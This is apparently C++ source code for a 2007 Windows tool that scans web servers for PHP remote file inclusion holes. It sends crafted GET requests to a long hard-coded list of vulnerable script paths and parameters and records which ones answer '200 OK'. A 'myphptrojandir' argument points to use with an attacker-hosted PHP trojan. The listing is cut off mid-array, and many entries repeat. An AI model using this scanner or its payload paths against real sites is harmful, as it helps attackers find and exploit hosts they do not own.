/*
php include vulu scanner,code by horse_b
2007-06-05
*/
#include "stdafx.h"
#include "getopt.h"
#include "windns.h"
#include <winsock.h>
struct cgiurl{
char *rmt_host;
char *rmt_wwwhost;
char *url;
int n;
int rmt_port;
int vebose;
};
int countvulscan = 0;
int findok = 0;
void SaveLog(char* c)
{
CTime tm=CTime::GetCurrentTime();
CString name = "log.s";
CFile file;
if(!file.Open(name,CFile::modeReadWrite))
{
file.Open(name,CFile::modeCreate|CFile::modeReadWrite);
}
file.SeekToEnd();
UINT nLen = strlen(c);
file.Write(c,nLen);
file.Write("\r\n",2);
file.Close();
}
UINT GetPhpInc(LPVOID pParam)
{
char holetmp[4096] = "\0";
char rbuff[1024];
struct cgiurl* tcgi=(struct cgiurl *)pParam;
char *hole=tcgi->url;
int port = tcgi->rmt_port;
int vebose = tcgi->vebose;
countvulscan++;
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
//"GET %s HTTP/1.0\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* \r\nAccept-Language: zh-cn\r\nAccept-Encoding: gzip, deflate\r\nIf-Modified-Since: Sun, 26 Jun 2005 15:43:05 GMT\r\nIf-None-Match: \"60794-12b3-e4169440\"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\nHost: %s\r\n\r\n",argv[2],argv[1]
char *rmt_host=tcgi->rmt_host;
char *rmt_wwwhost=tcgi->rmt_wwwhost;
CString url="GET ";
url+=hole;
url+="\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* \r\n";
url+="Referer: ";
url+=rmt_wwwhost;
url+="\r\n";
url+="Accept-Language: zh-cn\r\nAccept-Encoding: gzip, deflate\r\nIf-Modified-Since: Sun, 26 Jun 2005 15:43:05 GMT\r\nIf-None-Match: \"60794-12b3-e4169440\"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705)\r\n";
url+="Host: ";
url+=rmt_host;
url+="\r\n\r\n";
int num=tcgi->n;
SOCKET sockfd;
SOCKADDR_IN addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
{
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(rmt_host);
int r = connect(sockfd,(struct sockaddr *) &addr, sizeof(addr));
send(sockfd,url,url.GetLength(),0);
memset(rbuff,0,1024);
int e;
fd_set rd;
int n = 0;
FD_ZERO(&rd);
FD_SET(sockfd, &rd);
for(;;)
{
tv.tv_sec = 10;
tv.tv_usec = 0;
e = select(sockfd + 1, &rd, NULL, NULL, &tv);
if(e < 0 )continue;
else break;
}
if(e > 0 && FD_ISSET(sockfd, &rd) != 0)
{
n = recv(sockfd,rbuff,sizeof(rbuff),0);
if(n <= 0)
return 0;
}
//printf("---------------------->recv size(buff) = %d\n",n);
CString display="\tfind";
display+=hole;
display+="------->>>>>> hole ok\r\n";
if (strstr(rbuff,"200 OK")!=NULL)
{
sprintf(holetmp,"%s\n",display);
SaveLog(holetmp);
printf(holetmp);
findok++;
}
closesocket(sockfd);
return 0;
}
int StartScan(char *rmt_host,char *rmt_wwwhost,int rmt_host_port,char* myphptrojandir,int vebose)
{
char rbuff[1024];
char holetmp[4096] = "\0";
char* phpurl[430];
phpurl[0]="cgi-bin/gadgets/Blog/BlogModel.php?path=";
phpurl[1]="includes/header.php?systempath=";
phpurl[2]="Gallery/displayCategory.php?basepath=";
phpurl[3]="index.inc.php?PATH_Includes=";
phpurl[4]="nphp/nphpd.php?nphp_config[LangFile]=";
phpurl[5]="include/db.php?GLOBALS[rootdp]=";
phpurl[6]="ashnews.php?pathtoashnews=";
phpurl[7]="ashheadlines.php?pathtoashnews=";
phpurl[8]="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
phpurl[9]="demo/includes/init.php?user_inc=";
phpurl[10]="jaf/index.php?show=";
phpurl[11]="inc/shows.inc.php?cutepath=";
phpurl[12]="poll/admin/common.inc.php?base_path=";
phpurl[13]="pollvote/pollvote.php?pollname=";
phpurl[14]="sources/post.php?fil_config=";
phpurl[15]="modules/My_eGallery/public/displayCategory.php?basepath=";
phpurl[16]="bb_lib/checkdb.inc.php?libpach=";
phpurl[17]="include/livre_include.php?no_connect=lol&chem_absolu=";
phpurl[18]="index.php?from_market=Y&pageurl=";
phpurl[19]="modules/mod_mainmenu.php?mosConfig_absolute_path=";
phpurl[20]="pivot/modules/module_db.php?pivot_path=";
phpurl[21]="modules/4nAlbum/public/displayCategory.php?basepath=";
phpurl[22]="derniers_commentaires.php?rep=";
phpurl[23]="modules/coppermine/themes/default/theme.php?THEME_DIR=";
phpurl[24]="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
phpurl[25]="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
phpurl[26]="coppermine/themes/maze/theme.php?THEME_DIR=";
phpurl[28]="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
phpurl[29]="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
phpurl[30]="myPHPCalendar/admin.php?cal_dir=";
phpurl[31]="agendax/addevent.inc.php?agendax_path=";
phpurl[32]="modules/mod_mainmenu.php?mosConfig_absolute_path=";
phpurl[33]="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
phpurl[34]="main.php?page=";
phpurl[35]="default.php?page=";
phpurl[36]="index.php?action=";
phpurl[37]="index1.php?p=";
phpurl[38]="index2.php?x=";
phpurl[39]="index2.php?content=";
phpurl[40]="index.php?conteudo=";
phpurl[41]="index.php?cat=";
phpurl[42]="include/new-visitor.inc.php?lvc_include_dir=";
phpurl[43]="modules/agendax/addevent.inc.php?agendax_path=";
phpurl[44]="shoutbox/expanded.php?conf=";
phpurl[45]="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
phpurl[46]="pivot/modules/module_db.php?pivot_path=";
phpurl[47]="library/editor/editor.php?root=";
phpurl[48]="library/lib.php?root=";
phpurl[49]="e107/e107_handlers/secure_img_render.php?p=";
phpurl[50]="zentrack/index.php?configFile=";
phpurl[51]="main.php?x=";
phpurl[52]="becommunity/community/index.php?pageurl=";
phpurl[53]="GradeMap/index.php?page=";
phpurl[54]="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
phpurl[55]="calendar/calendar.php?serverPath=";
phpurl[56]="calendar/functions/popup.php?serverPath=";
phpurl[57]="calendar/events/header.inc.php?serverPath=";
phpurl[58]="calendar/events/datePicker.php?serverPath=";
phpurl[59]="calendar/setup/setupSQL.php?serverPath=";
phpurl[60]="calendar/setup/header.inc.php?serverPath=";
phpurl[61]="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
phpurl[62]="zentrack/index.php?configFile=";
phpurl[63]="pivot/modules/module_db.php?pivot_path=";
phpurl[64]="inc/header.php/step_one.php?server_inc=";
phpurl[65]="install/index.php?lng=../../include/main.inc&G_PATH=";
phpurl[66]="inc/pipe.php?HCL_path=";
phpurl[67]="include/write.php?dir=";
phpurl[68]="include/new-visitor.inc.php?lvc_include_dir=";
phpurl[69]="includes/header.php?systempath=";
phpurl[70]="support/mailling/maillist/inc/initdb.php?absolute_path=";
phpurl[71]="coppercop/theme.php?THEME_DIR=";
phpurl[72]="zentrack/index.php?configFile=";
phpurl[73]="pivot/modules/module_db.php?pivot_path=";
phpurl[74]="inc/header.php/step_one.php?server_inc=";
phpurl[75]="install/index.php?lng=../../include/main.inc&G_PATH=";
phpurl[76]="inc/pipe.php?HCL_path=";
phpurl[77]="include/write.php?dir=";
phpurl[78]="include/new-visitor.inc.php?lvc_include_dir=";
phpurl[79]="includes/header.php?systempath=";
phpurl[80]="support/mailling/maillist/inc/initdb.php?absolute_path=";
phpurl[81]="coppercop/theme.php?THEME_DIR=";
phpurl[82]="becommunity/community/index.php?pageurl=";
phpurl[83]="shoutbox/expanded.php?conf=";
phpurl[84]="agendax/addevent.inc.php?agendax_path=";
phpurl[85]="myPHPCalendar/admin.php?cal_dir=";
phpurl[86]="yabbse/Sources/Packages.php?sourcedir=";
phpurl[87
评论0